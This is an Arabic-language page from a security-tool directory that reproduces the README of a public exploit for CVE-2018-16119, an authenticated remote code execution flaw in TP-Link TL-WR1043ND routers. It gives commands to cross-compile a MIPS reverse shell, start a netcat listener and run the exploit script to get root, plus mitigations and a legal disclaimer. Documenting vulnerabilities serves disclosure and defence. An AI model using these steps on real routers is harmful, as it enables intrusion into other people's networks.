Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-16119 — TP-Link TL-WR1043ND - تنفيذ تعليمات برمجية عن بعد مع مصادقة | Kitploit
أدوات/GitHubGitHub/hdbreaker/cve-2018-16119
أمان الأنظمة المدمجةأمان إنترنت الأشياءالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن الأجهزةالتعلم والتعليمالفريق الأحمرتطوير الحمولات
GitHubhdbreaker/cve-2018-16119

CVE-2018-16119

TP-Link TL-WR1043ND - تنفيذ تعليمات برمجية عن بعد مع مصادقة

163منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودعالموقع الإلكتروني

CVE-2018-16119: تنفيذ التعليمات البرمجية عن بُعد المُصادق عليه في TP-Link WR1043ND

نظرة عامة

CVE-2018-16119 هو ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد المُصادق عليه تؤثر على أجهزة توجيه TP-Link TL-WR1043ND. تسمح هذه الثغرة للمهاجمين المُصادق عليهم بتنفيذ أوامر اعتباطية على الجهاز المستهدف بصلاحيات الجذر، مما قد يؤدي إلى اختراق كامل للنظام.

تفاصيل CVE: CVE-2018-16119

تأثير الثغرة

  • ناقل الهجوم: الشبكة
  • تعقيد الهجوم: منخفض
  • الصلاحيات المطلوبة: منخفضة (مطلوب مصادقة)
  • تفاعل المستخدم: لا شيء
  • النطاق: متغير
  • التأثير: اختراق كامل لسرية الجهاز وسلامته وتوافره

بمجرد استغلال الثغرة، يحصل المهاجم على وصول إلى شل الجذر على جهاز التوجيه، مما يمكنه من:

  • تعديل تكوينات جهاز التوجيه
  • مراقبة حركة مرور الشبكة
  • استخدام الجهاز كنقطة انطلاق للحركة الجانبية
  • تثبيت أبواب خلفية دائمة
  • تعطيل الاتصال بالشبكة

الأجهزة المتأثرة

  • TP-Link TL-WR1043ND (إصدارات برامج ثابتة متعددة)
  • ربما أجهزة TP-Link أخرى تستخدم برامج ثابتة مماثلة

المتطلبات الأساسية

متطلبات النظام

  • مضيف لينكس مع صلاحيات الجذر (مطلوب لخادم TFTP على المنفذ 69)
  • Docker (للترجمة المتقاطعة)
  • اتصال شبكي بالجهاز المستهدف
  • بيانات مصادقة صالحة لجهاز التوجيه المستهدف

التبعيات

root@kitploit:~
# Install required packages
sudo apt-get update
sudo apt-get install netcat docker.io

دليل الاستغلال

الخطوة 1: ترجمة حمولة الصدفة العكسية

يتطلب الاستغلال ملفًا ثنائيًا لصدفة عكسية بنظام MIPS كبير-endian. اتبع هذه الخطوات لترجمته:

root@kitploit:~
# Copy the source code to /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/

# Use Docker container with MIPS cross-compilation tools
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash

داخل حاوية Docker:

root@kitploit:~
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh

اخرج من Docker وانسخ الملف الثنائي المترجم:

root@kitploit:~
cp /tmp/shh exploit/tftp_server/

الخطوة 2: إعداد مستمع الصدفة العكسية

افتح طرفية وابدأ مستمع netcat على المنفذ 9669:

لينكس:

root@kitploit:~
nc -l -p 9669 -vv

ماك:

root@kitploit:~
nc -l 9669 -vv

الخطوة 3: تنفيذ الاستغلال

شغّل سكربت الاستغلال بصلاحيات الجذر (مطلوب لخادم TFTP):

root@kitploit:~
sudo python3 exploit/exploit.py

سوف يقوم السكربت بـ:

  1. المصادقة على جهاز التوجيه المستهدف
  2. بدء خادم TFTP على المنفذ 69
  3. استغلال الثغرة لتنزيل وتنفيذ الصدفة العكسية
  4. إنشاء اتصال عائد إلى المستمع الخاص بك

الخطوة 4: التفاعل مع الصدفة

بمجرد إنشاء الاتصال:

  • ستحصل على وصول الجذر إلى جهاز التوجيه
  • لن يتم عرض أي مخرجات مفصلة في البداية
  • ما عليك سوى البدء في كتابة الأوامر للتفاعل مع الصدفة

هيكل المشروع

root@kitploit:~
CVE-2018-16119/
├── exploit/
│   ├── exploit.py              # Main exploit script
│   ├── requirements.txt        # Python dependencies
│   ├── notes.txt              # Additional notes
│   └── tftp_server/
│       ├── reverse_shell_mipsbe.c  # Reverse shell source code
│       └── shh                     # Compiled MIPS binary
├── firmware/
│   └── wr740nv4_webrevert.bin     # Sample firmware
├── squashfs-root/                  # Extracted firmware filesystem
└── README.md                       # This file

اعتبارات الأمان

الإفصاح المسؤول

تم الإفصاح عن هذه الثغرة بمسؤولية ويجب استخدامها فقط من أجل:

  • اختبار الاختراق المصرح به
  • البحث الأمني في بيئات خاضعة للرقابة
  • الأغراض التعليمية

إشعار قانوني

⚠️ تحذير: يتم توفير هذا الاستغلال للأغراض التعليمية والاختبار المصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي. يتحمل المستخدمون مسؤولية ضمان حصولهم على التصريح المناسب قبل استخدام هذه الأداة.

توصيات التخفيف

  • التحديث إلى أحدث إصدار من البرامج الثابتة
  • تغيير بيانات الاعتماد الإدارية الافتراضية
  • تعطيل الإدارة عن بُعد إذا لم تكن مطلوبة
  • تنفيذ تجزئة الشبكة
  • مراقبة نشاط الشبكة المشبوه

التبعيات

تثبيت متطلبات بايثون:

root@kitploit:~
pip3 install -r exploit/requirements.txt

استكشاف الأخطاء وإصلاحها

المشكلات الشائعة

رفض إذن خادم TFTP:

  • تأكد من تشغيل السكربت بصلاحيات الجذر
  • تحقق من أن المنفذ 69 غير مستخدم بالفعل

فشل الاتصال:

  • تحقق من الاتصال الشبكي بالهدف
  • تأكد من صحة بيانات المصادقة
  • تحقق من إعدادات جدار الحماية

لا استجابة من الصدفة:

  • قد تستغرق الصدفة لحظة للتهيئة
  • حاول الضغط على Enter أو كتابة أوامر أساسية مثل id أو pwd

البحث والتطوير

يوضح هذا البحث ثغرات أمنية حرجة في البرامج الثابتة للأجهزة المضمنة. تسلط الثغرة الضوء على أهمية:

  • ممارسات البرمجة الآمنة في الأنظمة المضمنة
  • عمليات التدقيق الأمني المنتظمة لأجهزة إنترنت الأشياء
  • تحديثات البرامج الثابتة في الوقت المناسب وإدارة التصحيحات

المراجع

  • CVE-2018-16119 Official Entry
  • TP-Link Security Advisories

الاتصال والإسناد

البحث بواسطة: Alejandro Parodi
Twitter: @hdbreaker
LinkedIn: Alejandro Parodi


تم إجراء هذا البحث للأغراض التعليمية ولتحسين أمن الأنظمة المضمنة. يرجى الاستخدام بمسؤولية.

تنزيل الأداة